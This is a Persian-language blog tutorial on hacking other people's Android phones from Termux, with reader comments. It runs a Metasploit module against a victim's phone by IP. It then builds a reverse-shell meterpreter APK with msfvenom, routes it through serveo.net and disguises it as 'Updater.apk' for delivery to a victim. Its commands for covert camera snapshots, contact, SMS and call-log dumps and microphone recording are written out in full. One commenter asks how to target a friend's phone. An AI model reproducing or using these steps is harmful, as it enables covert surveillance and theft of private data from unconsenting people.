قالب فارسی
termuxاندرویدسیستم عامل هاهک و امنیت

آموزش هک گوشی با ترموکس ۲ روش متفاوت – همراه با ویدیو آموزشی

آموزش هک گوشی با ترموکس – termux

سلام خدمت کاربران مجله آی تی همه این سوال واسه تون پیش میاد یا از خود من میپرسین چجوری گوشی یک نفر بدون اینکه بهشون فایل مخرب بدیم هک کنیم. ما در این آموزش میخوام به شما آموزش هک گوشی با ترموکس ( termux ) را بدهیم تا اخر این آموزش با ماه همراه باشید.

آموزش نصب متااسپلویت در ترموکس

مطالب مرتبط

آموزش هک گوشی با ترموکس – termux

خوب دوستان میریم برای آموزش.  اکسپلویت این آسیب پذیری برروی متااسپلویت ( metasploit ) وجود داره و ما خیلی راحت میتونیم از این اکسپلویت استفاده کنیم ، پس من در قدم اول دستور msfconsole رو میزنم تا متااسپلویت برای من اجرا بشه

هک گوشی با متااسپلویت

بعد از اجرای metasploit با دستور search اکسپلویت مورد نظرمو سرچ میکنم

هک گوشی

بعد از اجرای دستور بالا که دستور سرچ بود حالا دستور use اکسپلویت رو انتخاب میکنم

هک گوشی

بعد از انتخاب کردن اکسپلویت ( Exploit ) با دستور show options تنظیمات مربوط به این اکسپلویت رو میبینیم

هک گوشی اندروید با ترموکس

موارد مهم را به ترتیب تنظیم می کنیم ، اولین مورد RHOSTS است ، یعنی IP گوشی قربانی است که می توانید IP گوشی را به راحتی دریافت کنید (یک ابزار گرافیکی به نام Fing Network Tools برای موبایل وجود دارد که به راحتی می توانید IP های کسانی که هستند را مشاهده کنید.

Fing Network Tools

بعد از تنظیم کردن ip تارگت دستور show action رو بزنید تا لیست کارهایی که ما میتونیم روی گوشی قربانی انجام بدیم رو بهمون بده

آموزش هک گوشی با ترموکس

خب بعد از دیدن لیست کار هایی که ما میتونیم روی گوشی قربانی انجام بدیم کافیه که با دستور set action  و بعد از دستوری که میخواهید روی گوشی اجرا بشه اینکار رو انجام بدید

هک گوشی اندروید

بعد از تنظیم کردن دستور بالا کافیه که run رو بزنید و منتظر باشید تا نتیجه رو به شما برگردونه.

هک فایل صوتی

خب میبینید که دستور اجرا شد و  داره name رو به ما من نشون میده حالا من دستور رو عوض میکنم و میخام که لیست فایل های صوتی رو ببینم

هک فایل صوتی با ترموکس

و تمام روش اول تموم شد موفق و پیروز باشید.

روش دوم آموزش هک گوشی با ترموکس

پیش نیاز های هک گوشی با ترموکس

  • نرم افزار Android TermuX (دانلود از فروشگاه Play)
  •  فریم ورک Metasploit نصب شده در TermuX (آموزش در اینجا)
  •  اینترنت فعال / اتصال WiFi
  • TermuX باید اجازه استفاده از Storage External را داشته باشد (برای این منظور فقط یکبار این فرمان را وارد کنید: “termux-setup-storage”)
  •  MiXplorer (برای امضای فایل APK، آن را از وب سایت UpToDown دانلود کنید)
  •  Apk Signer) MiX Signer برای MiXplorer، دانلود آن از فروشگاه Play)
  • از صفحه کلید هکر در خط فرمان TermuX استفاده کنید.

Port Forwarding

بسیاری از افراد از NGROK برای درگاه Port Forwarding استفاده می کنند. اما در NGROK ، می توانید هنگام اتصال مجدد به دامنه یا پورت جدید ، ایجاد کنید. دامنه و پورت اختصاصی فقط برای کاربران خاص است. به همین دلیل ، هر زمان که شروع به هک کنید ، باید یک فایل APK جدید برای NGROK ایجاد کنید.

در این آموزش ما از Serveo استفاده می کنیم. در Serveo ، می توانید دستی خود را در اینترنت بارگذاری کنید. برای استفاده از پورت Forveo forwarding ، باید بسته OpenSSH را روی TermuX نصب کنید. برای انجام این کار ، دستور زیر را در TermuX وارد کنید:

pkg install openssh

پس از نصب، این دستور را تایپ کنید:

ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net

در اینجا چند نکته وجود دارد که باید بخاطر بسپارید. اگر می خواهید پورت HTTP را فوروارد کنید ، پورت های مختلف را در هر دو بخش “Desired_Port” انتخاب کنید. اما در اینجا می خواهیم پورت TCP را جابجا کنیم. برای فرستنده پورت TCP ، باید همان پورت ها را در پورت Desired_Ports وارد کنید. همچنین “localhost” را تغییر ندهید. در اینجا ما می خواهیم یک پورت TCP را به جلو هدایت کنیم (برای مثال ۴۵۶۴). بعد از پورت جلو ، ممکن است اینگونه باشد:

ساخت فایل apk به همراه پیلود جاسازی شده

برای ایجاد فایل APK با Embedload Payload، این دستور را در ترموکس وارد میکنیم:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
> storage/downloads/Updater.apk

بعد از چند ثانیه منتظر ماندن:

همینجور که میبینید  میکنید فایل APK با پیلود جاسازی شده با موفقیت برای ما ساخته شد. Phone/SD-Card Storage -> downloads -> Updater.apk

همچنین شما می توانید با استفاده از برنامه APK Editor Pro نام (Default: MainActivity) و نسخه فایل APK تولید شده را تغییر دهید.

امضای فایل جدید APK ایجاد شده

ابتدا مدیر فایل MiXplorer را باز کنید و به فایل (APK Un-Signed (Updater.apk بروید.(در پوشه ی آپلود قرار می گیرد).

APK Un-Signed (Updater.apk) را کلیک کنید و دکمه MENU را در گوشه سمت راست بالای MiXplorer انتخاب کنید ، سپس “SUBSCRIBE” را انتخاب کنید.

این گزینه امضای فایل APK را به ما نشان می دهد. برای امضای خودکار و موفقیت آمیز فایل APK ، AUTO را انتخاب کنید.

در حال حاضر، فایل APK شما با نام filename)-signed.apk) با موفقیت امضا شده است و حجم ان نیز ۹٫۹KB میباشد.

راه اندازی Metasploit در TermuX

با وارد کردن دستور زیر در پنجره جدید ترموکس، چارچوب Metasploit را در TermuX فعال کنید:

msfconsole

برای نصب متاسپلویت به اول مقاله برین و نصب کنید

اگر این خطا را دریافت کردید: “Failed to connect to the database”، همانطور که در تصویر زیر نشان داده شد، دستورات زیر را در NEW SESSION وارد کنید.

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

بعد از چند ثانیه منتظر ماندن:

بعد از اینکه ابزار msfconsole شروع به کار می کند، دستورات زیر را با دقت وارد کنید:

msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z

نصب APK در گوشی Android تارگت

شما باید فایل Payload-Signed.apk را به دستگاه اندرویدی قربانی خود (مثلاً از طریق بلوتوث) -> نصب -> سپس باز کنید (مطمئن شوید دستگاه قربانی از اتصال اینترنتی فعال برخوردار است).

پس از باز کردن پرونده APK در تلفن قربانی ، فعال شدن جلسه Meterpreter را در بخش Metasploit خود مشاهده خواهید کرد. برای باز کردن یک جلسه Meterpreter از دستگاه قربانی خود ، روی دکمه برگشت کلیک کنید و این دستور را در جلسه Metasploit خود وارد کنید:

(sessions -i (Session ID

در (شناسه جلسه)، شماره جلسه Meterpreter را انتخاب کنید (به عنوان مثال هنگامی که قربانی شما فایل APK را باز می کند، این پیام را میبینید: Meterpreter Session Opened 1، در اینجا، ۱، شناسه جلسه Meterpreter است).

شما با موفقیت از Android دستگاه قربانی خود دسترسی گرفتید.

در محیط متااسپلویت نیاز به راهنمایی دارید:

می توانید فرمان {meterpreter> help} را برای مشاهده تمام دستورات در دسترس وارد کنید.

از جمله دستورات مهم:

گرفتن تصویر از دوربین ها

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg

دریافت همه مخاطبین

dump_contacts -o storage/downloads/X-Contacts.txt

دریافت همه پیام ها

dump_sms -o storage/downloads/X-SMS.txt

دریافت تماس های ورودی

dump_calllog -o storage/downloads/X-CallLog.txt

جاسوسی از طریق میکروفون

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3
Click to rate this post!
[Total: ۱۴ Average: ۳.۷]
نمایش بیشتر

نوشته های مشابه

۲۹ دیدگاه

  1. سلام و خسته نباشید
    میخواستم بدونم میتونیم از مثلا لیست فایل های صوتی چیزی رو دانلود کنیم و گوش کنیم اگه میشه با چه کدی؟

  2. سلام دوستان این حرکتی که آقای جعفری انجام داده کاملا واقعی و تایید شدس
    برای اینکه کارتون خوب پیش بره از روی عکس ها تقلید کنید که جواب مورد نظر رو بدست بیارید

  3. بخشید با این برنامه ای که معرفی کردید فقط میشه ip کسایی که به اینترنت وای فای ما وصل هستن گرفت
    الان من مثلا ip گوشی دوستم که اصلا یک بار هم به اینترنت من وصل نشد چطوری بگیرم؟

  4. سلام بعد از دستور run این متن رو مینویسه
    – Error Connecting
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary
    لطفا کمک کنید

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا